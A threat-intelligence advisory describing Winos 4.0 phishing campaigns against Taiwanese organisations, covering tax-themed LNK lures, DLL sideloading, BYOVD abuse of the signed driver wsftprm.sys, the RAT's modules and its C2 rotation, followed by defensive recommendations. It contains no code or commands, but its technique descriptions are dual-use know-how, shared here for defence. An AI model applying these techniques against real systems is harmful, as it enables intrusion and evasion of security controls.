Recent threat intelligence reveals multiple coordinated phishing campaigns targeting organizations in Taiwan using the Winos 4.0 malware framework. The operations rely heavily on localized social engineering themes, including tax notifications, electronic invoicing, and software installation packages to entice victims into executing malicious files.
The campaigns exhibit advanced operational discipline, incorporating multi-stage loaders, DLL sideloading, infrastructure rotation, and Bring Your Own Vulnerable Driver (BYOVD) techniques for stealth, persistence, and defensive evasion.
Threat Actor Context and Attribution
While no formal public attribution has been confirmed, infrastructure patterns, tooling overlaps, and operational similarities align with activity previously linked to the Silver Fox cluster, formally known as Silver Fox APT.
Observed characteristics consistent with advanced persistent threat (APT) operations include:
- Rotating domain registrations
- Shared TLS certificate infrastructure
- Multi-layer payload staging
- Long-term regional targeting strategy
The infrastructure agility and layered execution chains suggest a well-resourced and continuously operating threat group.
Winos 4.0 Malware Architecture
Winos 4.0 is a modular remote access framework derived from Gh0st RAT. It retains core RAT functionality while extending modular capabilities for post-exploitation control.
Core Capabilities
- Remote command execution
- Process injection
- Keylogging
- Screen capture
- File manipulation
- Plugin-based extensibility
The framework supports dynamic module loading, enabling operators to tailor capabilities per victim while minimizing forensic artifacts.
In the observed campaigns, Winos 4.0 demonstrates:
- Controlled C2 session management
- Kernel-level evasion via vulnerable driver loading
- In-memory plugin deployment
- Staged execution via loader chains
Campaign Delivery Mechanisms
FortiGuard’s research identified multiple infection pathways used across separate but related campaigns.
1. Tax-Themed Phishing with Malicious LNK Files
Attackers distribute RAR archives containing:
- A decoy document
- A malicious Windows shortcut (LNK file)
The LNK file invokes cmd.exe with obfuscated parameters, executing a scripted sequence that:
- Creates directories
- Copies and renames system utilities
- Downloads a next-stage payload (
Setup64.exe) from an attacker-controlled domain
This approach disguises malicious behavior as legitimate command-line activity, helping bypass static detection mechanisms.
2. DLL Sideloading via Forged Government Documents
Another infection vector uses compressed archives that include:
- A legitimate executable
- A malicious DLL
The attack exploits Windows DLL search order behavior. When executed, the legitimate application loads the attacker-supplied DLL placed in the same directory. This sideloading technique allows execution of malicious code without directly triggering standard security alerts.
This tactic increases stealth by leveraging trusted binaries.
3. BYOVD for Kernel-Level Defense Evasion
After establishing initial access, the malware attempts to elevate privileges and suppress security controls using a signed but vulnerable kernel driver (wsftprm.sys).
Through BYOVD, attackers:
- Terminate security processes
- Hide malicious activity
- Enable execution of memory-resident payloads
- Bypass driver signature enforcement controls
Using a legitimately signed driver significantly reduces detection likelihood compared to deploying unsigned kernel components.
Payload Execution Flow
Once sideloading or LNK-based execution succeeds, the malware performs the following sequence:
- Validates the Windows OS version
- Establishes a connection to a hard-coded C2 server
- Loads an “online module”
- Retrieves additional plugins directly into memory
Identified Modules
- 登录模块 (Authentication / Login Module)
- 文件管理 (File Management)
- 系统管理 (System Management)
- 屏幕监视 (Screen Monitoring / Capture)
These components collectively provide comprehensive remote administration and data exfiltration functionality.
Command-and-Control Infrastructure
Key infrastructure traits include:
- Rapidly rotated malicious domains mimicking official institutions
- Cloud-based file hosting services for payload staging
- Base64-encoded C2 endpoints embedded within binaries
- Frequently updated hosting nodes to evade static blocklists
This dynamic infrastructure model complicates traditional IOC-based detection strategies and emphasizes the need for behavioral analytics.
Defensive Recommendations
To mitigate similar threats, organizations should implement layered security controls:
- Advanced email filtering with sandboxing
- Endpoint Detection and Response (EDR) solutions
- Phishing awareness training and simulations
- Zero Trust network segmentation
- Monitoring for vulnerable or unauthorized driver loading
- Threat hunting for suspicious DLL sideloading activity
Security teams should also audit systems for anomalous driver installations and investigate unsigned or suspiciously loaded modules.
Conclusion
The Winos 4.0 campaigns targeting Taiwan represent a structured, multi-vector attack operation employing social engineering, modular malware, and kernel-level evasion techniques. The integration of DLL sideloading, BYOVD exploitation, and in-memory module loading reflects a mature threat actor capable of sustaining long-term regional targeting efforts.
Organizations must adopt behavioral detection, driver integrity monitoring, and proactive threat intelligence integration to counter increasingly sophisticated modular malware frameworks like Winos 4.0.
